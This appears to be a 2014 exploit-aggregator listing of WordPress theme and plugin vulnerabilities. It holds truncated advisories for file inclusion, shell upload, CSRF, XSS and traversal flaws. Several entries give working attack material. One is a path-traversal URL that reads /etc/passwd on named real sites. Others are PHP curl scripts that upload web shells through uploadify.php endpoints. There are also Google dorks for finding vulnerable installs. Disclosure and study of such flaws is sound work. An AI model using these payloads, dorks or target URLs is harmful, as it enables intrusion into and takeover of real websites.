WordPress LineNity Local File Inclusion

23 April 2014 - Source: http://www.mondounix.com
[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit : http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ] 
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php

...


WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 April 2014 - Source: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are many more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...


WordPress Business Intelligence 1.0.6 Shell Upload

31 March 2014 - Source: http://www.mondounix.com
##############################################################################################
# Exploit Title   : wordpress plugin "wp-business-intelligence" Remote code execution exploit
# Exploit Author  : Manish Kishan Tanwar
# vendor Home     : www.wpbusinessintelligence.com
# Version Affected: 1.0.6
# Discovered At   : IndiShell LAB (indishell.in aka indian cyber army)
# Love to         : zero cool,Team indishell,Hardeep Singh
##############################################################################################
 
 
////////////////////////////////////
POC Remote code Execution
////////////////////////////////////
this Plugin is vulnerable to remote code execution exploit because of ofc_upload_image.php...


WordPress HTML Sitemap 1.2 Cross Site Request Forgery

31 March 2014 - Source: http://www.mondounix.com
Details
================
Software: WP HTML Sitemap
Version: 1.2
Homepage: http://wordpress.org/plugins/wp-html-sitemap/
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
 
Description
================
CSRF vulnerability in WP HTML Sitemap 1.2
 
Vulnerability
================
A CSRF vulnerability exists which allows an attacker to delete the 
sitemap if a logged-in admin user visits a link of the attacker’s choosing.
Line 202 of inc/AdminPage.php says “// check whether form was just 
submitted” but the following if/elseif statements only check whether a 
particular button was pressed without checking nonce values. The form in 
question is printed in wp_html_sitemap_AdminPage::createSitemapForm() 
around line 146...


WordPress Vithy / Appius / Dagda / Vector / Shotzz Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Custom Background Shell Upload
# Google Dork     : inurl:"/wp-content/plugins/custom-background/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof:
-------------------------------------------------------------------------------------
<?php
$uploadfile="cafc.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch,...


WordPress Felici / Custom Background Shell Upload

25 March 2014 - Source: http://www.mondounix.com
######################################################################################
# Exploit Title   : WordPress Felici Shell Upload
# Google Dork     : inurl:"/wp-content/themes/felici/"
# Date            : 23-03-2014
# Exploit Author  : CaFc Versace
# Vendor Homepage : http://wordpressnull.com/themeforest-felici-v1-7-wordpress-magazine-theme/
# Tested on       : Windows 7
# Contact         : dwi[@]cooyy.net, cafc[@]surabayablackhat.org
#######################################################################################
 
 
Proof:
-------------------------------------------------------------------------------------
<?php
 
$uploadfile="cafc.php.jpg";
 
$ch = curl_init("http://127.0.0.1/wp-content/themes/felici/sprites/js/uploadify/uploadify.php");
curl_setopt($ch,...


WordPress LayerSlider 4.6.1 CSRF / Traversal

12 March 2014 - Source: http://www.mondounix.com
==========================================================
WordPress plugin LayerSlider WP Version 4.6.1 (possibly all versions) 
suffers from CSRF and from Directory Traversal vulnerabilities.
 
AFAIK multiple WordPress themes use this plugin.
And one of them is the satellite - v1.0.2 WordPress theme.
==========================================================
 
Tested on:
Server version: Apache/2.4.7 (Fedora)
Server built:   Mar  3 2014 12:12:09
 
$ php -v
PHP 5.5.10 (cli) (built: Mar  5 2014 17:13:58) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
 
Wordpress 3.8.1 (Fresh install)
 
Theme Default package: satellite - v1.0.2 + LayerSlider WP Version 4.6.1...


WordPress Barclaycart Shell Upload

10 March 2014 - Source: http://www.mondounix.com
                        WordPress Barclaycart Plugins Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/barclaycart"
#
#######################################################################################
 
Vuln : wp-content/plugins/barclaycart/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/barclaycart/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile",...


WordPress Premium Gallery Manager Shell Upload

8 March 2014 - Source: http://www.mondounix.com
          Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
 
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
 
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
 
Exploit :
 
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
...


WordPress thecotton Themes Remote File Upload Vulnerability

3 March 2014 - Source: http://www.mondounix.com
